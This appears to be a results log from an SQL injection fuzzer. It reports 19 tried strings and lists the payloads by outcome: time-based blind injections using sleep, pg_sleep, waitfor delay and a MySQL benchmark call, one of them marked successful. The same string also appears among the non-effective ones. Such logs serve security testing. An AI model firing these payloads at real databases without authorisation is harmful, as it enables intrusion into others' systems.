----------------------------------------------
|          ------------------------          |
|          SQLi Fuzzer Conclusions:          |
|          ------------------------          |
|                                            |
|       Strings tried:                 19    |
|       Successful Strings:            1     |
|                                            |
|             Fuzzer parameters:             |
|             ------------------             |
|       Maximum Base string:           10    |
|       Maximum commands in string:    1     |
|                                            |
|      You can check the tested strings      |
|             in the full report             |
|             at:report_file.txt             |
----------------------------------------------

Successful Strings
------------------
' or benchmark(10000000,MD5(1)) # 

Error Strings
-------------
) or sleep(2) = ' 
) or sleep(2) = ' 
' ) ; waitfor delay 
' ) or pg_sleep(2) -- 

None Effective Strings
----------------------
) ) ; waitfor delay 
" ) ; waitfor delay 
) or sleep(2) # 
" ) or pg_SLEEP(2) -- 
" ) or pg_SLEEP(2) # 
) or sleep(2) = ' 
' or benchmark(10000000,MD5(1)) # 
) or sleep(2) = ' 
' ) ; waitfor delay 
' ) or pg_sleep(2) -- 
) or sleep(2) = ' 
) or sleep(2) = ' 
' ) ; waitfor delay 
' ) or pg_sleep(2) -- 
